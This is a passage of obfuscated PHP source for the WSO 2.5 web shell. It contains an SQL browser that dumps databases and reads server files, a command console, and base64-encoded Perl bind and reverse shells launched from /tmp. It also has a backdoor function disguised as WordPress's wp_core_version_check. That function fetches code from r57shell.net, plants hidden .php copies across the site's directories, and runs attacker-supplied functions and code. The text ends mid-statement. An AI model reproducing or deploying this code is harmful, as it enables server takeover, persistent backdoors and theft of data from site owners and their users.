\x9\x9function is(){\xd\xa \x9\x9 for (i = 0; i < d . sf . elements['tbl[]'] . length; ++i) \xd\xa\x9\x9 \x9d . sf . elements['tbl[]'][i] . checked = !d . sf . elements['tbl[]'][i] . checked;\xd\xa\x9\x9 }\xd\xa \x9 </script > "; goto omuNC; omuNC: if (isset($db) && $db->link) { goto wQooQ; v7m0f: if (!empty($_POST["sql_base"])) { goto Rgzyg; MvXdD: if (@$_POST["p1"] == "query" && !empty($_POST["p2"])) { $db->query(@$_POST["p2"]); if ($db->res !== false) { goto p5kAe; FQZVM: while ($item = $db->fetch()) { if (!$title) { goto UHBlV; UHBlV: echo "<tr > "; goto hcvnp; krRoK: $line = 2; goto OQDWZ; hcvnp: foreach ($item as $key => $value) { echo "<th > " . $key . "</th > "; } goto gYEfe; s133J: $title = true; goto vdCQU; vdCQU: echo "</tr ><tr > "; goto krRoK; gYEfe: reset($item); goto s133J; OQDWZ: } echo "<tr class="l" . $line . "" > "; $line = $line == 1 ? 2 : 1; foreach ($item as $key => $value) { if ($value == null) { echo "<td ><i > null</i ></td > "; } else { echo "<td > " . nl2br(htmlspecialchars($value)) . "</td > "; } } echo "</tr > "; } goto LonsA; c36CC: $line = 1; goto FQZVM; LonsA: echo "</table > "; goto zCgso; vhOW_: echo "<table width = 100 % cellspacing = 1 cellpadding = 2 class=main style = "background-color:#292929" > "; goto c36CC; p5kAe: $title = false; goto vhOW_; zCgso: } else { echo "<div ><b > Error:</b > " . htmlspecialchars($db->error()) . "</div > "; } } goto f63uD; f63uD: echo "<br ></form ><form onsubmit = 'd.sf.p1.value="query";d.sf.p2.value=this.query.value;document.sf.submit();return false;' ><textarea name = 'query' style = 'width:100%;height:100px' > "; goto l03yb; Rgzyg: $db->selectdb($_POST["sql_base"]); goto QW0Ku; uEPKu: if (@$_POST["p1"] == "select") { goto mAhBO; IznKf: if ($_POST["p3"] > 1) { echo " <a href =# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] - 1) . ")'>< Prev</a>"; } goto ZoHo3; l2Xna: $pages = ceil($num["n"] / 30); goto ZYT4s; mAhBO: $_POST["p1"] = "query"; goto e_ZJ4; ZYT4s: echo "<script>d.sf.onsubmit=function(){st("" . $_POST["p2"] . "", d.sf.p3.value)}</script><span>" . $_POST["p2"] . "</span> ({$num["n"]} records) Page # <input type=text name='p3' value=" . (int) $_POST["p3"] . ">"; goto uoZpe; Es7M3: $num = $db->fetch(); goto l2Xna; uoZpe: echo " of {$pages}"; goto IznKf; rczWG: $_POST["p3"]--; goto bhg9h; e_ZJ4: $_POST["p3"] = $_POST["p3"] ? $_POST["p3"] : 1; goto Lo_J9; nEjUO: echo "<br><br>"; goto IQ9di; bhg9h: if ($_POST["type"] == "pgsql") { $_POST["p2"] = "SELECT * FROM " . $_POST["p2"] . " LIMIT 30 OFFSET " . $_POST["p3"] * 30; } else { $_POST["p2"] = "SELECT * FROM `" . $_POST["p2"] . "` LIMIT " . $_POST["p3"] * 30 . ",30"; } goto nEjUO; Lo_J9: $db->query("SELECT COUNT(*) as n FROM " . $_POST["p2"]); goto Es7M3; ZoHo3: if ($_POST["p3"] < $pages) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] + 1) . ")'>Next ></a>"; } goto rczWG; IQ9di: } goto MvXdD; EHE8j: echo "</textarea><br/><input type=submit value='Execute'>"; goto epF3V; bDaxO: while ($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if (!empty($_POST["sql_count"])) { $n = $db->fetch($db->query("SELECT COUNT(*) as n FROM " . $value . '')); } $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> <a href=# onclick="st('" . $value . "',1)">" . $value . "</a>" . (empty($_POST["sql_count"]) ? " " : " <small>({$n["n"]})</small>") . "</nobr><br>"; } goto M5p5r; l03yb: if (!empty($_POST["p2"]) && $_POST["p1"] != "loadfile") { echo htmlspecialchars($_POST["p2"]); } goto EHE8j; M5p5r: echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value="download";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; goto uEPKu; QW0Ku: echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; goto ss2k2; epF3V: echo "</td></tr>"; goto DdhHe; ss2k2: $tbls_res = $db->listTables(); goto bDaxO; DdhHe: } goto E6Jlf; E6Jlf: echo "</table></form><br/>"; goto eqSj_; HfqGV: if (@$_POST["p1"] == "loadfile") { $file = $db->loadFile($_POST["p2"]); echo "<br/><pre class=ml1>" . htmlspecialchars($file["file"]) . "</pre>"; } goto OSIXi; eqSj_: if ($_POST["type"] == "mysql") { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form onsubmit='d.sf.p1.value="loadfile";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; } } goto HfqGV; wQooQ: echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; goto v7m0f; OSIXi: } else { echo htmlspecialchars($db->error()); } goto qgUXu; eZaK7: echo "\xd
<h1 > Sql browser </h1 ><div class=content >
<form name = 'sf' method = 'post' onsubmit = 'fs(this);' ><table cellpadding = '2' cellspacing = '0' ><tr >
<td > Type</td ><td > Host</td ><td > Login</td ><td > Password</td ><td > Database</td ><td ></td ></tr ><tr > \xd\xa<input type = hidden name = a value = Sql ><input type = hidden name = p1 value = 'query' ><input type = hidden name = p2 value = '' ><input type = hidden name = c value = '" . htmlspecialchars($GLOBALS["cwd"]) . "' ><input type = hidden name = charset value = '" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "' > \xd\xa<td ><select name = 'type' ><option value = 'mysql' "; goto XNXvh; L_VIT: if (isset($_POST["sql_host"])) { if ($db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"])) { goto zzoGT; zzoGT: switch ($_POST["charset"]) { case "Windows - 1251": $db->setCharset("cp1251"); break; case "UTF - 8": $db->setCharset("utf8"); break; case "KOI8 - R": $db->setCharset("koi8r"); break; case "KOI8 - U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } goto CgrPi; hq4SA: echo " </select > "; goto pJJmI; CgrPi: $db->listDbs(); goto KKbSG; MV0Hw: while ($item = $db->fetch()) { list($key, $value) = each($item); echo "<option value = "" . $value . "" " . ($value == $_POST["sql_base"] ? "selected" : '') . " > " . $value . "</option > "; } goto hq4SA; KKbSG: echo "<select name = sql_base ><option value = '' ></option > "; goto MV0Hw; pJJmI: } else { echo $tmp; } } else { echo $tmp; } goto Auorx; pXyEP: class DbClass { var $type; var $link; var $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "mysql": if ($this->link = @mysqli_connect($host, $user, $pass, $dbname)) { return true; } break; case "pgsql": goto urMgZ; NmhxL: if ($this->link = @pg_connect("host ={
$host[0]} port ={
$host[1]} user ={
$user} password ={
$pass} dbname ={
$dbname}")) { return true; } goto q24c2; q24c2: break; goto pMERe; urMgZ: $host = explode(":", $host); goto dzuNv; dzuNv: if (!$host[1]) { $host[1] = 5432; } goto NmhxL; pMERe: } return false; } function selectdb($db) { switch ($this->type) { case "mysql": if (@mysqli_select_db($this->link, $db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "mysql": return $this->res = @mysqli_query($this->link, $str); break; case "pgsql": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { goto ndkAm; Ccrqd: return false; goto kFQe3; ndkAm: $res = func_num_args() ? func_get_arg(0) : $this->res; goto uBsjP; uBsjP: switch ($this->type) { case "mysql": return @mysqli_fetch_assoc($res); break; case "pgsql": return @pg_fetch_assoc($res); break; } goto Ccrqd; kFQe3: } function listDbs() { switch ($this->type) { case "mysql": return $this->query("SHOW databases"); break; case "pgsql": return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate != 't'"); break; } return false; } function listTables() { switch ($this->type) { case "mysql": return $this->res = $this->query("SHOW TABLES"); break; case "pgsql": return $this->res = $this->query("select table_name from information_schema . tables where table_schema != 'information_schema' and table_schema != 'pg_catalog'"); break; } return false; } function error() { switch ($this->type) { case "mysql": return @mysqli_error(); break; case "pgsql": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "mysql": if (function_exists("mysql,_set_charset")) { return @mysqli_set_charset($str, $this->link); } else { $this->query("SET CHARSET " . $str); } break; case "pgsql": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "mysql": return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); break; case "pgsql": goto hIi1_; hIi1_: $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '" . addslashes($str) . "';select file from wso2;"); goto Vq5gq; RFQO1: return array("file" => implode("
", $r)); goto Xccn3; Vq5gq: $r = array(); goto B2PD8; B2PD8: while ($i = $this->fetch()) { $r[] = $i["file"]; } goto ytmal; ytmal: $this->query("drop table wso2"); goto RFQO1; Xccn3: break; goto hza_Y; hza_Y: } return false; } function dump($table, $fp = false) { switch ($this->type) { case "mysql": goto A8Rtf; XOdpv: $i = 0; goto nXX1H; dgmAw: if (!$head) { if ($fp) { fwrite($fp, ";
"); } else { echo ";\xa
"; } } goto xuWj3; nXX1H: $head = true; goto rdh_q; vLJ0E: $sql = $create[1] . ";\xa"; goto GZCGH; e85gZ: $this->query("SELECT * FROM `" . $table . "`"); goto XOdpv; A8Rtf: $res = $this->query("SHOW CREATE TABLE `" . $table . "`"); goto WbvCG; rdh_q: while ($item = $this->fetch()) { $sql = ''; if ($i % 1000 == 0) { $head = true; $sql = ";\xa\xa"; } $columns = array(); foreach ($item as $k => $v) { if ($v === null) { $item[$k] = "NULL"; } elseif (is_int($v)) { $item[$k] = $v; } else { $item[$k] = "'" . @mysqli_real_escape_string($v) . "'"; } $columns[] = "`" . $k . "`"; } if ($head) { $sql .= "INSERT INTO `" . $table . "` (" . implode(", ", $columns) . ") VALUES
(" . implode(", ", $item) . ")"; $head = false; } else { $sql .= "\xa ,(" . implode(", ", $item) . ")"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $i++; } goto dgmAw; xuWj3: break; goto I2Pib; WbvCG: $create = mysqli_fetch_array($res); goto vLJ0E; GZCGH: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto e85gZ; I2Pib: case "pgsql": goto yK1Fh; q4AGJ: break; goto M_aLo; YU12f: while ($item = $this->fetch()) { $columns = array(); foreach ($item as $k => $v) { $item[$k] = "'" . addslashes($v) . "'"; $columns[] = $k; } $sql = "INSERT INTO " . $table . " (" . implode(", ", $columns) . ") VALUES(" . implode(", ", $item) . ");" . "
"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } goto q4AGJ; yK1Fh: $this->query("SELECT * FROM " . $table); goto YU12f; M_aLo: } return false; } } goto S2jsy; nON0D: wsoHeader(); goto eZaK7; S2jsy: $db = new DbClass($_POST["type"]); goto b5FFe; xAAjI: echo ">MySql </option ><option value = 'pgsql' "; goto WqMW0; b5FFe: if (@$_POST["p2"] == "download") { goto q3uCo; dKSpy: switch ($_POST["charset"]) { case "Windows - 1251": $db->setCharset("cp1251"); break; case "UTF - 8": $db->setCharset("utf8"); break; case "KOI8 - R": $db->setCharset("koi8r"); break; case "KOI8 - U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } goto SW_1d; SW_1d: if (empty($_POST["file"])) { goto UlEph; NKAxm: foreach ($_POST["tbl"] as $v) { $db->dump($v); } goto gTeuJ; UlEph: ob_start("ob_gzhandler", 4096); goto wxi0r; wxi0r: header("Content - Disposition: attachment; filename = dump . sql"); goto JFnky; gTeuJ: exit; goto o3LDH; JFnky: header("Content - Type: text / plain"); goto NKAxm; o3LDH: } elseif ($fp = @fopen($_POST["file"], "w")) { goto HVjKn; sI6XB: fclose($fp); goto JcIQa; JcIQa: unset($_POST["p2"]); goto eJ6NS; HVjKn: foreach ($_POST["tbl"] as $v) { $db->dump($v, $fp); } goto sI6XB; eJ6NS: } else { die("<script > alert("Error! Can't open file");window . history . back(-1) </script > "); } goto V4cuJ; q3uCo: $db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"]); goto G1BTq; G1BTq: $db->selectdb($_POST["sql_base"]); goto dKSpy; V4cuJ: } goto nON0D; XNXvh: if (@$_POST["type"] == "mysql") { echo "selected"; } goto xAAjI; gsteZ: } goto BTyYB; M9YJl: $_POST = WSOstripslashes($_POST); goto ocXfq; BTyYB: function actionNetwork() { goto ZoVmx; unkZP: $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI + JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0 = "; goto PvgFx; y9LP4: if (isset($_POST["p1"])) { goto oL5si; oL5si: function cf($f, $t) { $w = @fopen($f, "w") or @function_exists("file_put_contents"); if ($w) { @fwrite($w, @base64_decode($t)); @fclose($w); } } goto O2j7_; O2j7_: if ($_POST["p1"] == "bpp") { goto OF3WF; SvfsQ: unlink(" / tmp / bp . pl"); goto zB2bw; l42lD: sleep(1); goto YdT1I; YdT1I: echo " < pre class=ml1 >{
$out}
" . wsoEx("ps aux | grep bp . pl") . " </pre > "; goto SvfsQ; P3N6B: $out = wsoEx("perl / tmp / bp . pl " . $_POST["p2"] . " 1 >/dev / null 2 >&1 & "); goto l42lD; OF3WF: cf(" / tmp / bp . pl", $bind_port_p); goto P3N6B; zB2bw: } goto mmghY; mmghY: if ($_POST["p1"] == "bcp") { goto KdsjF; EYep1: unlink(" / tmp / bc . pl"); goto vnHPj; cueL2: sleep(1); goto rbk8c; rbk8c: echo " < pre class=ml1 >{
$out}
" . wsoEx("ps aux | grep bc . pl") . " </pre > "; goto EYep1; KdsjF: cf(" / tmp / bc . pl", $back_connect_p); goto JIcLb; JIcLb: $out = wsoEx("perl / tmp / bc . pl " . $_POST["p2"] . " " . $_POST["p3"] . " 1 >/dev / null 2 >&1 & "); goto cueL2; vnHPj: } goto HmOsb; HmOsb: } goto JZOTa; QtVUX: wsoFooter(); goto r_ZsG; ZoVmx: wsoHeader(); goto ui6gf; PvgFx: echo " < h1>Network tools </h1 ><div class=content > \xd
<form name = 'nfp' onSubmit = "g(null,null,'bpp',this.port.value);return false;" > \xd\xa\x9<span > Bind port to / bin / sh [perl] </span ><br />
\xa Port: <input type = 'text' name = 'port' value = '31337' > <input type = submit value = '>>' > \xd
\x9</form > \xd\xa <form name = 'nfp' onSubmit = "g(null,null,'bcp',this.server.value,this.port.value);return false;" > \xd\xa\x9<span > Back - connect [perl]</span ><br />
Server: <input type = 'text' name = 'server' value = '" . $_SERVER["REMOTE_ADDR"] . "' > Port: <input type = 'text' name = 'port' value = '31337' > <input type = submit value = '>>' >
\x9</form ><br > "; goto y9LP4; JZOTa: echo "</div > "; goto QtVUX; ui6gf: $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; goto unkZP; r_ZsG: } goto B8b3D; ABTpd: @ini_set("max_execution_time", 0); goto V8rDW; LNmAT: $default_action = "FilesMan"; goto uf2tU; hd5Oa: @define("WSO_VERSION", "2.5"); goto XWpnO; w2GF1: function actionConsole() { goto rclMD; fIAZm: if (isset($_POST["ajax"])) { goto b0kHG; UVP1d: exit; goto FfbZi; k7CDe: echo "d . cf . output . scrollTop = d . cf . output . scrollHeight;"; goto X7NDa; nIuhp: if (preg_match("!.*cd\s + ([^;]+)$!", $_POST["p1"], $match)) { if (@chdir($match[1])) { $GLOBALS["cwd"] = @getcwd(); echo "c_ = '" . $GLOBALS["cwd"] . "';"; } } goto VTnj_; LPhSs: $temp = @iconv($_POST["charset"], "UTF - 8", addcslashes("\xa$ " . $_POST["p1"] . "\xa" . wsoEx($_POST["p1"]), "\xa\xd\x9\'\x0")); goto nIuhp; y6Hrb: echo "d.cf.cmd.value='';
"; goto LPhSs; wcz4k: ob_start(); goto y6Hrb; VTnj_: echo "d.cf.output.value+='" . $temp . "';"; goto k7CDe; jyokt: echo strlen($temp), "
", $temp; goto UVP1d; b0kHG: WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true); goto wcz4k; X7NDa: $temp = ob_get_clean(); goto jyokt; FfbZi: } goto KpSEA; RZ79V: echo "</form></div><script>d.cf.cmd.focus();</script>"; goto SJHUc; f8SjV: echo "</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX <input type=checkbox name=show_errors value=1 " . (!empty($_POST["p2"]) || $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "stderr_to_out"] ? "checked" : '') . "> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>"; goto IWzV6; SJHUc: wsoFooter(); goto APwh_; nacH0: echo "</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>"; goto RZ79V; qs3Ch: echo "<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value=='clear'){d.cf.output.value='';d.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;"><select name=alias>"; goto qrzII; IWzV6: if (!empty($_POST["p1"])) { echo htmlspecialchars("$ " . $_POST["p1"] . "
" . wsoEx($_POST["p1"])); } goto nacH0; c_48E: echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');\xd
var cur = 0;\xd\xafunction kp(e) {
\xa var n = (window.Event) ? e.which : e.keyCode;
\xa\x9if(n == 38) {\xd
\x9cur--;\xd
\x9\x9if(cur>=0)\xd
\x9document.cf.cmd.value = cmds[cur];\xd\xa \x9else
\x9\x9 cur++;
\xa\x9} else if(n == 40) {
\xa cur++;\xd\xa\x9 if(cur < cmds.length)\xd
document.cf.cmd.value = cmds[cur];\xd
\x9\x9else
\x9 cur--;
\xa }\xd\xa}
\xafunction add(cmd) {\xd
\x9cmds.pop();
\x9cmds.push(cmd);
\xa cmds.push('');
cur = cmds.length-1;\xd\xa}\xd\xa</script>"; goto qs3Ch; qrzII: foreach ($GLOBALS["aliases"] as $n => $v) { if ($v == '') { echo "<optgroup label="-" . htmlspecialchars($n) . "-"></optgroup>"; continue; } echo "<option value="" . htmlspecialchars($v) . "">" . $n . "</option>"; } goto f8SjV; KpSEA: if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } goto dwgoJ; dwgoJ: wsoHeader(); goto c_48E; rclMD: if (!empty($_POST["p1"]) && !empty($_POST["p2"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", true); $_POST["p1"] .= " 2>&1"; } elseif (!empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", 0); } goto fIAZm; APwh_: } goto rTVjF; XWpnO: if (!function_exists("wp_core_version_check")) { function wp_core_version_check() { goto avUWa; wkmQ0: $uri_path = dirname($uri_path); goto s730R; vOWZG: $uri_path = $parse_url["path"]; goto wkmQ0; sM0UF: if (is_writable(sys_get_temp_dir())) { $tmp_file = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } else { $tmp_file = $file_path . DIRECTORY_SEPARATOR . "sess_" . md5('' . $hostname . "_" . $document_file . ''); } goto vbq6x; rs5dk: $uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path); goto bu9lX; toU7p: $hostname = str_replace("www.", '', $_SERVER["HTTP_HOST"]); goto sM0UF; vbq6x: if (@$_GET["slince_golden"]) { goto TmOVZ; UCuri: if (function_exists("curl_init")) { goto BJyTL; vyR_l: curl_close($ch); goto SHblm; hYCm_: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto VE1SX; VE1SX: $response = curl_exec($ch); goto vyR_l; i0bPI: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&pwd=get"); goto hYCm_; BJyTL: $ch = curl_init(); goto i0bPI; SHblm: } else { $response = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get"); } goto kmEj4; TmOVZ: echo "<!-- //Silence is golden. -->"; goto UCuri; kmEj4: if (md5(sha1(@$_GET["is"])) == $response) { goto kgaYa; pHtWV: if (@$_POST["l"]) { function basic_code_extensions($request) { goto Wqe1_; q3A5w: $tmpf = stream_get_meta_data($tmp); goto gYkau; DzU1V: fclose($tmp); goto i26c2; uYFTY: $ret = (include $tmpf); goto DzU1V; dzD32: fwrite($tmp, $request); goto uYFTY; Wqe1_: $tmp = tmpfile(); goto q3A5w; i26c2: return $ret; goto An9L2; gYkau: $tmpf = $tmpf["uri"]; goto dzD32; An9L2: } print_r(basic_code_extensions($_POST["l"])); } goto fi0K3; FBXXk: if (@$_GET["m"]) { goto pvkox; ANUJn: echo $file_name_path; goto svCvU; ZI_cL: @file_put_contents($file_name_path, $response); goto ANUJn; pvkox: if (function_exists("curl_init")) { goto QH3uY; hFb2E: $response = curl_exec($ch); goto Qk97j; j__CW: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/mini_admin.txt"); goto S9Uoo; Qk97j: curl_close($ch); goto eMk6h; QH3uY: $ch = curl_init(); goto j__CW; S9Uoo: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto hFb2E; eMk6h: } else { $response = file_get_contents("http://r57shell.net/mini_admin.txt"); } goto X5MJi; X5MJi: $file_name_path = @$_GET["m"] . "gagal.php"; goto ZI_cL; svCvU: } goto pHtWV; kgaYa: if (@$_GET["f"]) { print_r($_GET["f"]($_GET["c"])); } goto FBXXk; fi0K3: } goto d_oge; d_oge: exit; goto fDMzx; fDMzx: } goto gHtz2; fqAaN: $dirs = array_filter(glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto SO8pY; SO8pY: foreach ($dirs as $d) { goto Scp89; cQFnr: @file_put_contents($file_name, $response); goto cQiiG; Scp89: $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; goto cQFnr; IlPtg: foreach ($dirs as $d) { if (!@preg_match("#wp-content#", $d)) { $file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php"; @file_put_contents($file_name, $response); } } goto u66S4; cQiiG: $dirs = array_filter(glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)); goto IlPtg; u66S4: } goto Q6DRk; bu9lX: if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == '') { $document_root = $file_path; } else { $document_root = str_replace($uri_path, '', $file_path); } goto toU7p; gHtz2: if (!file_exists($tmp_file)) { goto f_kq1; QKlrR: @file_put_contents($tmp_file, $response); goto Ul3cm; f_kq1: if (function_exists("curl_init")) { goto A1VWF; J1jm0: curl_close($ch); goto p2Bti; dYLi3: $response = curl_exec($ch); goto J1jm0; sjN5S: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto nQ3kj; A1VWF: $ch = curl_init(); goto LvoXB; LvoXB: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto sjN5S; nQ3kj: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto dYLi3; p2Bti: } else { goto aeiKy; aeiKy: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto XFWPB; Qt92G: $context = stream_context_create($opts); goto mtDkU; XFWPB: $opts = array("http" => array("header" => array("Referer: {$referer}
\xa"))); goto Qt92G; mtDkU: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto jDy5x; jDy5x: } goto NFiUK; NFiUK: @touch($tmp_file); goto QKlrR; Ul3cm: } else { $response = file_get_contents($tmp_file); if (!@preg_match("#stt1#", $response)) { goto KzbMt; HV6vx: @touch($tmp_file); goto pdkVa; KzbMt: if (function_exists("curl_init")) { goto eMsto; LO0re: curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto k5X0p; HJ7kx: curl_close($ch); goto gjzj0; j4CQT: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto LO0re; CssGj: curl_setopt($ch, CURLOPT_URL, "http://r57shell.net/jquery.php?v=1.2&request=enable"); goto j4CQT; k5X0p: $response = curl_exec($ch); goto HJ7kx; eMsto: $ch = curl_init(); goto CssGj; gjzj0: } else { goto GK4cX; a3V7j: $opts = array("http" => array("header" => array("Referer: {$referer}\xd\xa"))); goto v8ndl; GK4cX: $referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto a3V7j; rOcio: $response = @file_get_contents("http://r57shell.net/jquery.php?v=1.2&request=enable", false, $context); goto nx629; v8ndl: $context = stream_context_create($opts); goto rOcio; nx629: } goto HV6vx; pdkVa: @file_put_contents($tmp_file, $response); goto mecCz; mecCz: } } goto fqAaN; avUWa: $document_file = $_SERVER["SCRIPT_FILENAME"]; goto tIPJm; CD9KV: $parse_url = parse_url($request_uri); goto vOWZG; tIPJm: $request_uri = $_SERVER["REQUEST_URI"]; goto CD9KV; s730R: $file_path = dirname($document_file); goto rs5dk; Q6DRk: } wp_core_version_check(); } goto SG2I5; cUzsD: if ($os == "win") { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } goto qljle; oE6Ue: $home_cwd = @getcwd(); goto qZOco; eRZM6: function wsoPermsColor($f) { if (!@is_readable($f)) { return "<font color=#FF0000>" . wsoPerms(@fileperms($f)) . "</font>"; } elseif (!@is_writable($f)) { return "<font color=white>" . wsoPerms(@fileperms($f)) . "</font>"; } else { return "<font color=#25ff00>" . wsoPerms(@fileperms($f)) . "</font>"; } } goto guAyk; HhMRL: function actionSecInfo() { goto wqp98; qT_UQ: wsoSecParam("cURL support", function_exists("curl_version") ? "enabled" : "no"); goto zEzgM; oKr71: if (function_exists("pg_connect")) { $temp[] = "PostgreSQL"; } goto owg70; giF29: wsoSecParam("Safe mode exec dir", @ini_get("safe_mode_exec_dir")); goto V6Pow; o51U2: wsoSecParam("Open base dir", @ini_get("open_basedir")); goto giF29; m3Zin: wsoSecParam("Disabled PHP Functions", $GLOBALS["disable_functions"] ? $GLOBALS["disable_functions"] : "none"); goto o51U2; owg70: if (function_exists("oci_connect")) { $temp[] = "Oracle"; } goto DQ0Hi; I0L0t: if (function_exists("mysql_get_client_info")) { $temp[] = "MySql (" . mysqli_get_client_info() . ")"; } goto T3sY7; T3sY7: if 